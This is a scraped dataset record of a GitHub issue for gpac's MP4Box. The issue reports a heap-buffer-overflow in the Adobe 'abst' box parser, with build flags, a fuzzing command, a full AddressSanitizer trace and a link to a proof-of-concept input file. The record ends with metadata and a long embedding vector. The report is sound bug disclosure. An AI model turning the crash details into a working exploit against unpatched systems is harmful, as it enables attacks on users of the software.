Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==73339==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-141.zip](https://github.com/gpac/gpac/files/5042085/heap-overflow-abst_box_read-box_code_adobe-141.zip)
A heap-buffer-overflow in box_code_adobe.c:141
https://api.github.com/repos/gpac/gpac/issues/1569/comments
1
2020-08-07T14:53:11
2020-09-01T15:16:27Z
https://github.com/gpac/gpac/issues/1569
675,069,002
1,569
true
This is a GitHub Issue repo:gpac owner:gpac Title : A heap-buffer-overflow in box_code_adobe.c:141 Issue date: --- start body --- ## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==73339==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000e2d3 at pc 0x7f61cb5fc3d5 bp 0x7ffc8913b6b0 sp 0x7ffc8913ae58 READ of size 20 at 0x60300000e2d3 thread T0 #0 0x7f61cb5fc3d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x56330736c407 in abst_box_read isomedia/box_code_adobe.c:141 #2 0x56330715bb64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x56330715bb64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x56330715d041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x5633071946f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x56330719f951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x56330719f951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x563306ac97e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f61ca5c6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x563306a9af09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60300000e2d3 is located 0 bytes to the right of 19-byte region [0x60300000e2c0,0x60300000e2d3) allocated by thread T0 here: #0 0x7f61cb632612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x56330736a3a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c067fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9c50: fa fa fa fa fa fa fa fa 00 00[03]fa fa fa 00 00 0x0c067fff9c60: 04 fa fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 0x0c067fff9c70: 00 00 00 06 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9c80: fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9c90: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9ca0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==73339==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-141.zip](https://github.com/gpac/gpac/files/5042085/heap-overflow-abst_box_read-box_code_adobe-141.zip) --- end body ---
3,581
[ -0.022147733718156815, 0.04269733279943466, -0.008699280209839344, 0.012739846482872963, 0.028811654075980186, 0.02689690701663494, -0.02917349524796009, 0.04357178509235382, -0.020398830994963646, 0.018122242763638496, -0.014315366744995117, 0.012996151112020016, 0.02949010767042637, 0.014805360697209835, 0.02578122913837433, 0.009287272579967976, -0.007655215449631214, 0.02250957489013672, 0.0015415968373417854, 0.004745404701679945, 0.03790292888879776, -0.03820446506142616, -0.01179755013436079, 0.0414610393345356, -0.018061935901641846, 0.02496708370745182, -0.020715443417429924, 0.008480667136609554, 0.0038935686461627483, 0.0369681715965271, -0.011993547901511192, 0.015069203451275826, -0.01090802252292633, 0.016780413687229156, 0.03163100406527519, 0.012362928129732609, 0.04345117136836052, 0.07936397194862366, -0.011578937992453575, 0.015378276817500591, 0.0080283647403121, -0.06392538547515869, -0.025389233604073524, 0.013508760370314121, 0.004149873275309801, 0.007817290723323822, 0.02780151180922985, -0.004538099281489849, -0.04345117136836052, -0.005672623869031668, 0.030681168660521507, -0.007338603958487511, -0.02487662434577942, -0.04930094629526138, -0.004364716820418835, -0.01711210235953331, 0.02639937400817871, 0.01988622173666954, 0.007210451643913984, 0.021996965631842613, -0.017865939065814018, 0.019554534927010536, 0.009302349761128426, 0.027726128697395325, -0.011300018057227135, -0.00624930951744318, 0.014609362930059433, 0.03331959992647171, -0.015453659929335117, 0.032776836305856705, 0.00004517133129411377, -0.03250545635819435, 0.029761487618088722, 0.05089908093214035, 0.007764521986246109, -0.013878140598535538, 0.03313867747783661, 0.0160868838429451, -0.03585249185562134, 0.03962167724967003, -0.05279874801635742, 0.033651288598775864, -0.031902384012937546, 0.04064689576625824, 0.014209829270839691, 0.006569690071046352, -0.041913341730833054, -0.07912274450063705, -0.02490677684545517, -0.04414470121264458, 0.01125478744506836, 0.019464073702692986, 0.010576334781944752, 0.0005036573857069016, 0.009392810054123402, 0.01655426248908043, -0.026112915948033333, -0.010870330967009068, -0.0508086197078228, -0.009664191864430904, -0.02662552520632744, -0.01938869059085846, -0.01760963350534439, 0.003448804607614875, -0.006871224846690893, 0.010327568277716637, 0.003314998699352145, -0.02443939819931984, 0.004651174880564213, 0.12616217136383057, 0.009151582606136799, 0.01935853622853756, 0.006166387349367142, 0.049632634967565536, -0.0021936658304184675, 0.0162074975669384, -0.011375402100384235, -0.013629375025629997, -0.0370887853205204, -0.02222311682999134, -0.001631114981137216, -0.03621433302760124, -0.027228595688939095, 0.019675148651003838, -0.004455177113413811, 0.031842079013586044, -0.0014869436854496598, 0.000356423610355705, -0.012958459556102753, -0.02926395647227764, -0.047612350434064865, -0.032354686409235, -0.0009220369975082576, -0.02437909133732319, -0.015046588145196438, -0.00832236185669899, -0.02449970506131649, 0.03868691995739937, 0.017685018479824066, 0.03681740164756775, -0.06682012230157852, -0.022871417924761772, 0.021891428157687187, 0.0034638813231140375, -0.015453659929335117, 0.00857112742960453, 0.008141440339386463, 0.03799339011311531, -0.036485716700553894, -0.010320030152797699, 0.011661860160529613, -0.026097839698195457, 0.006750611122697592, 0.04064689576625824, 0.06012604758143425, 0.010696948505938053, 0.030560554936528206, 0.03307837247848511, -0.01702164113521576, -0.015204894356429577, -0.0063246930949389935, -0.04242595285177231, 0.012257390655577183, -0.014601824805140495, -0.03319898620247841, -0.030786706134676933, 0.05394458398222923, 0.01953945681452751, -0.006701611913740635, 0.025389233604073524, 0.0021993196569383144, 0.000729808525647968, 0.021936658769845963, 0.023745868355035782, -0.056809164583683014, -0.012242314405739307, 0.0321737676858902, 0.018770543858408928, -0.03449558466672897, -0.003090732032433152, -0.024831393733620644, 0.02281111106276512, 0.021966813132166862, 0.004112181253731251, 0.010206954553723335, -0.013523837551474571, 0.023791098967194557, -0.05174337700009346, 0.019177615642547607, -0.0028306583408266306, -0.006426461040973663, -0.01531796995550394, -0.002655391115695238, -0.013508760370314121, 0.06965454667806625, -0.01626780442893505, -0.03443527966737747, -0.0022916647139936686, -0.00011978942347923294, 0.024710780009627342, 0.0066186897456645966, -0.01077233161777258, -0.035581111907958984, 0.009686806239187717, -0.031962692737579346, 0.011352786794304848, -0.011639244854450226, 0.03621433302760124, 0.024394167587161064, 0.0019392459653317928, -0.014360596425831318, -0.011541245505213737, 0.014232444576919079, 0.0007067222613841295, -0.010214492678642273, 0.016976410523056984, -0.03337990492582321, -0.0029550413601100445, -0.037480778992176056, -0.008699280209839344, 0.026851676404476166, -0.005699008237570524, 0.002478239359334111, -0.022675419226288795, -0.035731878131628036, -0.0046134828589856625, -0.020640060305595398, 0.01482043694704771, -0.0073046814650297165, 0.009618961252272129, 0.023338796570897102, 0.02415294013917446, 0.02449970506131649, 0.004285563714802265, 0.027319056913256645, -0.002442432101815939, -0.0021484356839209795, 0.007817290723323822, 0.003232076531276107, 0.010696948505938053, -0.021062208339571953, 0.02973133511841297, -0.015604428015649319, -0.025419386103749275, 0.015996422618627548, 0.07092099636793137, -0.015197355300188065, -0.009965726174414158, -0.019494228065013885, 0.01126986462622881, 0.005861083511263132, 0.0021201667841523886, 0.00741775706410408, 0.00411595031619072, 0.0020862440578639507, -0.0007020108168944716, 0.017383484169840813, 0.005834699142724276, -0.005307013168931007, -0.014202291145920753, 0.01745886728167534, 0.001808266737498343, -0.027575360611081123, 0.009174196980893612, -0.0023161645513027906, -0.012528772465884686, 0.001631114981137216, 0.010553719475865364, -0.012619232758879662, -0.00899327639490366, 0.03998351842164993, -0.016041653230786324, -0.016780413687229156, -0.026414452120661736, 0.0006473576067946851, 0.01895146444439888, 0.001207081601023674, 0.0161773432046175, 0.009279734455049038, -0.004379793535917997, -0.010817562229931355, 0.003999105654656887, 0.008608819916844368, 0.018815774470567703, -0.0010544296819716692, -0.026972291991114616, -0.0005220322054810822, 0.02231357805430889, -0.01476013008505106, 0.011563860811293125, 0.0024801241233944893, 0.007741906680166721, -0.04070720449090004, 0.0185443926602602, 0.01325999479740858, 0.015981346368789673, -0.006219156086444855, 0.004296871367841959, -0.01586073264479637, 0.008148979395627975, -0.03083193674683571, 0.007044607773423195, -0.022238194942474365, -0.0006256847991608083, -0.034676507115364075, 0.018710236996412277, -0.049421560019254684, 0.01525766309350729, -0.015204894356429577, -0.0035958029329776764, 0.04055643454194069, -0.05469841882586479, -0.03356082737445831, -0.0029776564333587885, -0.024484628811478615, -0.015129510313272476, 0.002065513515844941, -0.010395413264632225, -0.00988280400633812, 0.01614719070494175, -0.022208040580153465, 0.019629918038845062, -0.025675691664218903, 0.01209154725074768, 0.03431466594338417, 0.00790021289139986, -0.033681441098451614, 0.010252184234559536, -0.07791659981012344, 0.013516299426555634, -0.009083736687898636, -0.019840992987155914, 0.014518902637064457, -0.04179272800683975, 0.00808867160230875, -0.018031783401966095, -0.030997781082987785, 0.005069554317742586, 0.008442975580692291, 0.006705380976200104, -0.008880200795829296, 0.017971476539969444, 0.02599230222404003, 0.004443869460374117, -0.0230674147605896, -0.013832910917699337, 0.005533164367079735, -0.007368757389485836, -0.004029259085655212, -0.001190120354294777, 0.0010157955111935735, 0.03681740164756775, 0.014451056718826294, 0.045742835849523544, 0.0026911983732134104, -0.013395684771239758, -0.015197355300188065, -0.015694888308644295, 0.006603613030165434, -0.01652410812675953, -0.01381029561161995, -0.024243401363492012, -0.003394151572138071, 0.013222302310168743, 0.011948318220674992, 0.008020826615393162, 0.004734097048640251, -0.010071263648569584, -0.010320030152797699, 0.004048105329275131, -0.05020555108785629, 0.045592065900564194, -0.029761487618088722, 0.02590184286236763, 0.0009366425801999867, -0.029414722695946693, 0.005661316681653261, 0.020609905943274498, -0.02017267979681492, 0.017036717385053635, -0.03907891362905502, 0.030726399272680283, 0.03910906985402107, -0.050326164811849594, 0.010342644527554512, 0.008216824382543564, -0.024273553863167763, 0.040315207093954086, -0.020866211503744125, -0.038174308836460114, -0.05427626892924309, 0.05647747591137886, -0.0232181828469038, -0.05843745172023773, -0.018031783401966095, 0.032053153961896896, -0.016313035041093826, -0.023429255932569504, 0.023142797872424126, -0.051260922104120255, 0.04999447613954544, -0.007870059460401535, -0.00022744678426533937, 0.025766151025891304, -0.005491703283041716, 0.04257671907544136, 0.0009112005936913192, -0.005356012377887964, 0.031751617789268494, -0.001624518889002502, 0.02443939819931984, 0.010749717243015766, -0.011631706729531288, 0.010674333199858665, 0.03950106352567673, 0.014081676490604877, -0.00967926811426878, 0.0043760244734585285, -0.04185303673148155, 0.041189659386873245, -0.022298501804471016, -0.009988341480493546, 0.004609713796526194, 0.0072142211720347404, 0.027635667473077774, 0.03347036615014076, -0.00940034817904234, 0.01929822936654091, 0.02362525463104248, -0.00900835357606411, 0.004387331660836935, -0.0003498275182209909, -0.021589893847703934, -0.007598677650094032, 0.0073951417580246925, -0.03639525547623634, -0.045682527124881744, -0.04887879639863968, -0.02397201955318451, -0.001687652780674398, -0.01886100322008133, 0.02400217205286026, -0.0011024867417290807, -0.039320141077041626, 0.020836057141423225, -0.05843745172023773, -0.025132928043603897, -0.00940034817904234, 0.01751917414367199, -0.010802485048770905, -0.02908303402364254, 0.008985738269984722, -0.01276246178895235, -0.00012108508235542104, 0.010304952971637249, -0.010350183583796024, -0.022841263562440872, -0.01022203080356121, 0.025826457887887955, 0.0006690304144285619, 0.002186127472668886, 0.006166387349367142, 0.016478879377245903, -0.008035903796553612, 0.03630479425191879, 0.046768054366111755, -0.015408430248498917, -0.024514781311154366, 0.002706275088712573, -0.01982591487467289, 0.0012890613870695233, 0.016780413687229156, 0.008736971765756607, -0.01623765006661415, 0.006822225637733936, 0.031148549169301987, 0.013267532922327518, -0.021016977727413177, -0.016855796799063683, -0.06350323557853699, -0.005261783022433519, -0.026595372706651688, -0.0151144340634346, 0.003239614889025688, 0.00955111626535654, -0.017006564885377884, -0.02852519601583481, 0.0037503396160900593, 0.0026855445466935635, 0.006641304586082697, 0.03901860862970352, 0.0067204576916992664, -0.0068561481311917305, -0.027138134464621544, 0.01723271608352661, 0.0006044831243343651, -0.02727382630109787, 0.0160567294806242, 0.025419386103749275, 0.017383484169840813, -0.002919234102591872, -0.03341006115078926, 0.0160567294806242, 0.00552562577649951, 0.030907319858670235, -0.04604436829686165, -0.04324009642004967, 0.04908987134695053, -0.005913851782679558, -0.02067021280527115, -0.026474758982658386, -0.007123760413378477, 0.006754380185157061, -0.023987095803022385, -0.01985606923699379, -0.021921582520008087, 0.02362525463104248, -0.0033771900925785303, 0.037360165268182755, 0.021936658769845963, -0.008970661088824272, -0.016780413687229156, -0.01947914995253086, 0.0278618186712265, 0.029791641980409622, 0.0005846949061378837, 0.02216280996799469, -0.009656652808189392, 0.03226422891020775, -0.010440643876791, -0.011224634014070034, 0.0023067414294928312, -0.020594829693436623, 0.011586476117372513, 0.0059816972352564335, -0.01454151701182127, -0.0004237977846059948, 0.01953945681452751, 0.012566464021801949, -0.01483551412820816, -0.01991637609899044, 0.03992321342229843, -0.031781770288944244, 0.026203377172350883, -0.03083193674683571, 0.012581541202962399, 0.0017724594799801707, 0.017066871747374535, -0.005910082720220089, -0.003051155712455511, 0.0026308915112167597, -0.005427626892924309, 0.010727101936936378, 0.023987095803022385, 0.009777267463505268, 0.012061393819749355, -0.01209154725074768, 0.0012805807637050748, 0.004888633731752634, 0.018288087099790573, 0.002146551152691245, -0.0016075576422736049, 0.0005950601771473885, -0.014375673606991768, -0.007945442572236061, -0.0021126284264028072, -0.008623896166682243, 0.03530972823500633, -0.029158418998122215, -0.008631434291601181, 0.005650009028613567, -0.006320924032479525, 0.04544129967689514, -0.007922828197479248, -0.00016690423944965005, 0.00267989095300436, 0.0056387013755738735, -0.007772060576826334, -0.0004848114913329482, -0.03313867747783661, 0.004930094350129366, -0.042064107954502106, -0.0161773432046175, -0.0006662035011686385, 0.021243128925561905, -0.02920364961028099, -0.003220768878236413, 0.029158418998122215, -0.00419133435934782, -0.011865396052598953, 0.008118825033307076, 0.01792624592781067, -0.01723271608352661, -0.019343459978699684, -0.001578346360474825, -0.01792624592781067, 0.017881015315651894, -0.0015293470351025462, -0.0005097823450341821, 0.006060850340873003, -0.02353479340672493, 0.05168307200074196, 0.007817290723323822, -0.023776022717356682, -0.02278095670044422, 0.01938869059085846, 0.021303435787558556, 0.0001259143464267254, -0.022419115528464317, 0.050356317311525345, 0.00000897390054888092, 0.022298501804471016, 0.03135962411761284, -0.01194077916443348, 0.012528772465884686, -0.02225327119231224, 0.02537415735423565, 0.01388567965477705, -0.0023783559445291758, 0.019313305616378784, 0.02945995330810547, -0.05846760421991348, 0.02020283415913582, -0.02581138163805008, 0.008623896166682243, 0.019675148651003838, -0.020021913573145866, -0.03862661123275757, -0.014767668209969997, -0.01748901978135109, -0.011307556182146072, 0.04884864389896393, 0.02038375474512577, -0.030319327488541603, -0.021996965631842613, 0.008352515287697315, 0.032354686409235, -0.01203124038875103, -0.016192421317100525, -0.009324965067207813, -0.003857761388644576, -0.00014735158765688539, -0.021152669563889503, -0.008262054063379765, -0.021016977727413177, 0.007975596003234386, 0.00886512454599142, -0.014767668209969997, 0.02478616312146187, 0.022886494174599648, -0.03687771037220955, -0.015981346368789673, 0.007764521986246109, 0.017820708453655243, 0.02228342369198799, -0.007466756273061037, 0.041008736938238144, 0.04339086264371872, -0.0007802213658578694, -0.014948589727282524, -0.009618961252272129, -0.04547145217657089, -0.01203124038875103, 0.0037107630632817745, 0.006094772834330797, -0.0005446472787298262, -0.030937474220991135, -0.0029720028396695852, 0.024484628811478615, 0.017760401591658592, -0.0011316979071125388, 0.003375305561348796, 0.019901299849152565, 0.0006402903818525374, -0.0013248686445876956, -0.02671598643064499, 0.009422963485121727, 0.02835935167968273, -0.02344433404505253, -0.0060796961188316345, 0.002866465598344803, 0.0012664463138207793, 0.014669669792056084, 0.002546084811910987, -0.038445692509412766, 0.008842509239912033, 0.003273537615314126, -0.014466133899986744, -0.03353067487478256, -0.024952007457613945, 0.038294922560453415, -0.015468737110495567, 0.025087697431445122, 0.02967102825641632, -0.003051155712455511, -0.02581138163805008, 0.006660150829702616, -0.0007651446503587067, -0.0060344659723341465, -0.005533164367079735, -0.036636482924222946, 0.012822768650949001, -0.0016631530597805977, -0.027982432395219803, 0.014677207916975021, 0.022238194942474365, -0.002992733148857951, 0.015559197403490543, 0.018680082634091377, -0.012310159392654896, -0.01346353068947792, 0.014737514778971672, -0.020142527297139168, 0.030756553635001183, 0.007707984186708927, -0.0255249235779047, -0.0003627841069828719, -0.015137048438191414, -0.00830728467553854, 0.015129510313272476, -0.02400217205286026, -0.025766151025891304, -0.018288087099790573, -0.03941060230135918, -0.0033828439190983772, -0.0064679221250116825, -0.009030967950820923, 0.010463259182870388, 0.005216552875936031, 0.012106623500585556, -0.015996422618627548, -0.027590436860919, 0.01003357209265232, 0.009988341480493546, 0.0065131522715091705, -0.0016980180516839027, 0.023821251466870308, -0.0052504753693938255, 0.00995818804949522, 0.03512880951166153, 0.002442432101815939, -0.00528439786285162, 0.015513967722654343, -0.03344021365046501, 0.002380240708589554, -0.012958459556102753, 0.006362385116517544, 0.0017903631087392569, -0.04881849139928818, 0.030243944376707077, 0.014013831503689289, 0.0366666354238987, 0.007670292165130377, -0.03449558466672897, -0.030620861798524857, -0.003450689371675253, 0.023760944604873657, 0.0019213423365727067, 0.0045682527124881744, -0.006905147805809975, -0.0026120455004274845, 0.009732036851346493, -0.0009625557577237487, 0.005378627683967352, 0.001418155967257917, -0.0005206187488511205, 0.016780413687229156, -0.0034469200763851404, 0.02829904481768608, -0.004779327195137739, 0.012378005310893059, -0.003313113935291767, -0.03533988445997238, 0.008405283093452454, 0.017911169677972794, -0.04227518290281296, 0.013455991633236408, 0.015875808894634247, 0.01883085072040558, 0.025389233604073524, -0.021740661934018135, 0.002992733148857951, -0.053100284188985825, 0.022057272493839264, -0.00032768354867585003, -0.011096482165157795, 0.02861565537750721, -0.013365531340241432, -0.004590868018567562, 0.002947503002360463, 0.010206954553723335, -0.0023029723670333624, 0.03506850078701973, -0.026731062680482864, -0.00580454571172595, -0.01886100322008133, 0.00765898497775197, -0.0027496207039803267, -0.006984300445765257, -0.002059859922155738, 0.015951192006468773, 0.0230975691229105, -0.025826457887887955, -0.03998351842164993, -0.01264184806495905, -0.019192691892385483, -0.018710236996412277, 0.02359510026872158, -0.014948589727282524, 0.005732931196689606, -0.0030662324279546738, 0.0004980036173947155, 0.028027663007378578, 0.003857761388644576, 0.008721895515918732, 0.000675626506563276, 0.013682142831385136, -0.018348393961787224, 0.008073595352470875, 0.014850590378046036, -0.00808867160230875, 0.006075927056372166, 0.009762190282344818, -0.056839317083358765, 0.01338814664632082, -0.01953945681452751, 0.002282241825014353, 0.014488749206066132, 0.010794946923851967, 0.01702164113521576, -0.017594557255506516, -0.01901177130639553, 0.0015368853928521276, 0.03781246766448021, 0.0011411209125071764, 0.021620048210024834, -0.012792615219950676, -0.007312219589948654, -0.011616629548370838, 0.03292760252952576, -0.03395282104611397, 0.005367320030927658, -0.017594557255506516, -0.02531384862959385, 0.0025762382429093122, -0.03057563304901123, -0.005732931196689606, 0.0023482025135308504, 0.0033338444773107767, -0.010372797958552837, 0.02137882076203823, 0.037330012768507004, -0.017745325341820717, 0.019524380564689636, -0.011639244854450226, 0.014511363580822945, -0.013938447460532188, -0.01994652859866619, 0.037631548941135406, -0.007772060576826334, 0.031962692737579346, 0.02391171269118786, -0.010531104169785976, 0.005137399770319462, 0.0255249235779047, 0.004794403910636902, -0.0016697491519153118, -0.04218472167849541, 0.013056457974016666, -0.028630733489990234, -0.018906233832240105, -0.00988280400633812, 0.008020826615393162, 0.012362928129732609, -0.028253814205527306, -0.01407413836568594, 0.01950930431485176, 0.0007887020474299788, 0.005480395630002022, 0.03567156940698624, 0.0023142797872424126, 0.023293565958738327, -0.014013831503689289, 0.026851676404476166, 0.02125820517539978, -0.039169374853372574, -0.010259722359478474, -0.02712305821478367, -0.035490650683641434, 0.006411384325474501, 0.0127775389701128, -0.015227509662508965, -0.04094843193888664, -0.025298772379755974, 0.03907891362905502, 0.03989305719733238, -0.012061393819749355, -0.0368475578725338, -0.01298107486218214, -0.023203104734420776, -0.0042252568528056145, -0.006023158319294453, 0.011541245505213737, -0.003371536498889327, -0.029098112136125565, 0.021514510735869408, 0.043903473764657974, -0.0010883522918447852, 0.0055934712290763855, 0.028630733489990234, 0.014843052253127098, 0.015996422618627548, -0.022961877286434174, -0.03515896201133728, -0.0255550779402256, -0.010983406566083431, -0.04465730860829353, 0.025268619880080223, 0.0003206163237337023, 0.03989305719733238, 0.014021369628608227, -0.003100154921412468, -0.018649930134415627, 0.03250545635819435, -0.0029154650401324034, -0.02122805267572403, -0.03518911451101303, 0.01106632873415947, -0.0017489020247012377, 0.0035204191226512194, 0.000732164247892797, -0.013772604055702686, -0.002110743895173073, 0.01502397283911705, 0.012491080909967422, 0.005895006004720926, -0.04875818267464638, -0.0015538467559963465, -0.003209461458027363, -0.03793308138847351, -0.009935572743415833, 0.01461690105497837, 0.026474758982658386, 0.0021032055374234915, -0.011835242621600628, 0.007817290723323822, -0.0071614524349570274, -0.020338524132966995, -0.0059816972352564335, -0.045863449573516846, -0.023112645372748375, -0.016448725014925003, -0.025163082405924797, -0.008638973347842693, -0.010712024755775928, 0.020715443417429924, -0.020685289055109024, -0.00953603908419609, -0.02041390910744667, 0.018680082634091377, 0.016780413687229156, 0.019177615642547607, -0.017850862815976143, -0.021951736882328987, 0.024318784475326538, -0.0015199240297079086, -0.030907319858670235, 0.0049074795097112656, -0.025042468681931496, -0.016659799963235855, -0.009935572743415833, 0.013863064348697662, 0.0009276907658204436, 0.0648299902677536, 0.006083465181291103, 0.0418228805065155, -0.0048622493632137775, -0.036455560475587845, -0.007338603958487511, -0.020745595917105675, -0.012204622849822044, -0.017353329807519913, 0.037420473992824554, -0.014104291796684265, -0.011488477699458599, -0.03892814740538597, 0.004688866902142763, 0.027816588059067726, -0.015815502032637596, -0.007508217357099056, 0.01290569081902504, 0.013455991633236408, 0.029806718230247498, -0.044928692281246185, 0.021951736882328987, 0.0018506700871512294, -0.0116090914234519, -0.029716258868575096, -0.018031783401966095, -0.03337990492582321, -0.024273553863167763, -0.005133630707859993, 0.0116090914234519, 0.010553719475865364, -0.02356494776904583, 0.002253972925245762, 0.010968329384922981, 0.018499162048101425, -0.029595643281936646, -0.0005168495699763298, -0.03630479425191879, -0.006317154970020056, 0.0023934326600283384, -0.003714532358571887, 0.007093606982380152, -0.0035901491064578295, -0.020594829693436623, 0.004982863087207079, -0.00010659727558959275, 0.05430642515420914, -0.02415294013917446, -0.00395010644569993, -0.023851405829191208, 0.009324965067207813, 0.007018223404884338, 0.03226422891020775, -0.007191605865955353, 0.0017630364745855331, 0.02038375474512577, 0.01359168253839016, 0.0025950842536985874, -0.000009054879228642676, 0.004338332451879978, 0.0006280405214056373, -0.012679539620876312, -0.0029041573870927095, 0.019177615642547607, -0.016689952462911606, -0.02204219624400139, -0.0006855205865576863, 0.03585249185562134, 0.01670503057539463, -0.05373350903391838, -0.009287272579967976, -0.006874994374811649, 0.0139459865167737, 0.016976410523056984, 0.00017986081365961581, -0.0030813091434538364, -0.005514318123459816, 0.010357721708714962, -0.01773024909198284, 0.057894688099622726, -0.015815502032637596, -0.019524380564689636, -0.008254515938460827, 0.007044607773423195, -0.013418300077319145, -0.011684474535286427, -0.019177615642547607, -0.019554534927010536, -0.017624711617827415, 0.012551387771964073, -0.0505673922598362, -0.019494228065013885, -0.025690767914056778, 0.011217095889151096, -0.00023027366842143238, 0.007530832663178444, 0.0063699232414364815, 0.01973545551300049, 0.008533435873687267, -0.02505754493176937, -0.024861548095941544, 0.02811812423169613, -0.024318784475326538, 0.024680625647306442, -0.018227780237793922, -0.007391372695565224, -0.025072621181607246, -0.025600306689739227, -0.023489562794566154, -0.009513423778116703, 0.015890885144472122, -0.045652374625205994, 0.008292208425700665, 0.007104914635419846, -0.03859645873308182, 0.018665006384253502, -0.01381029561161995, -0.01938869059085846, -0.027349209412932396, -0.0034770735073834658, -0.006686535198241472, -0.02134866639971733, 0.00017196909175254405, 0.024831393733620644, 0.07972580939531326, 0.00504316994920373, 0.018408700823783875, -0.022328654304146767, 0.015634581446647644, 0.006011850666254759, 0.010010956786572933, 0.011398016475141048, -0.0030341942328959703, 0.019283153116703033, 0.02662552520632744, -0.00002292430326633621, 0.00042049973853863776, 0.0016678645042702556, 0.024288630113005638, 0.009317426010966301, -0.004131027031689882, -0.010885407216846943, 0.007255681790411472, -0.0010223916033282876, -0.00552562577649951, 0.019494228065013885, 0.03172146528959274, 0.0020843595266342163, 0.013252455741167068, -0.02415294013917446, 0.013636913150548935, -0.02970118075609207, -0.01448121014982462, -0.011820165440440178, 0.0038935686461627483, -0.011993547901511192, -0.011578937992453575, -0.004937632940709591, 0.017911169677972794, -0.013772604055702686, 0.013440915383398533, -0.01570996455848217, -0.008465590886771679, -0.01944899745285511, 0.01316953357309103, -0.0016838836017996073, -0.020217910408973694, 0.014503825455904007, 0.004696405027061701, -0.027515053749084473, 0.02739444002509117, 0.0032433841843158007, -0.004572021774947643, -0.01248354185372591, -0.0039274911396205425, -0.015981346368789673, 0.021620048210024834, 0.036787249147892, -0.006841071415692568, 0.016403494402766228, -0.0014690400566905737, -0.0010139108635485172, -0.029429800808429718, -0.017066871747374535, -0.0031887309160083532, 0.014624439179897308, -0.012249852530658245, 0.020549599081277847, -0.0001607793237781152, -0.019343459978699684, -0.02079082652926445, 0.016222573816776276, -0.005476626567542553, 0.01970530115067959, 0.01111155841499567, 0.011081404983997345, 0.015875808894634247, -0.004564483650028706, 0.006162618286907673, 0.029595643281936646, -0.019961606711149216, 0.020956670865416527, -0.04839634150266647, -0.0022841263562440872, 0.02596214972436428, 0.02896242029964924, -0.009807420894503593, 0.026354145258665085, -0.012197083793580532, 0.020248064771294594, -0.01953945681452751, 0.008375129662454128, -0.01077233161777258, -0.005273090209811926, -0.00877466332167387, -0.003976490814238787, 0.012257390655577183, 0.015529043972492218, 0.005895006004720926, 0.016162266954779625, -0.009317426010966301, -0.026640603318810463, -0.011774935759603977, -0.0031604620162397623, 0.02347448654472828, 0.010108955204486847, 0.0301685594022274, -0.007625062018632889, -0.0160567294806242, 0.016192421317100525, 0.014933512546122074, 0.0160868838429451, 0.0009234504541382194, 0.010998482815921307, -0.03491773456335068, -0.01938869059085846, 0.01988622173666954, -0.009626499377191067, -0.020278217270970345, 0.006158849224448204, 0.00949080940335989, -0.006727995816618204, -0.018710236996412277, -0.03160085156559944, -0.021996965631842613, -0.004617252387106419, 0.03033440373837948, -0.020504368469119072, -0.0018808235181495547, 0.004063182044774294, -0.0007882309146225452, -0.012325236573815346, 0.0415816530585289, 0.03515896201133728, 0.020609905943274498, 0.010003417730331421, -0.005521856714040041, -0.0031095780432224274, 0.026565218344330788, -0.02210250310599804, 0.02222311682999134, 0.0036259563639760017, -0.008834971114993095, -0.0005535990931093693, -0.005706546828150749, 0.010320030152797699, 0.024544935673475266, 0.010289876721799374, -0.0020221679005771875, -0.006471691187471151, 0.0020692828111350536, 0.002604507142677903, 0.0127021549269557, -0.01271723210811615, -0.008925431407988071, -0.02178589254617691, 0.007719291839748621, 0.03778231516480446, -0.0016885950462892652, 0.008819893933832645, 0.007922828197479248, -0.020579753443598747, -0.005872390698641539, 0.005687701050192118, -0.0010911792051047087, 0.019720377400517464, 0.021559741348028183, -0.005465318914502859, 0.009091275744140148, 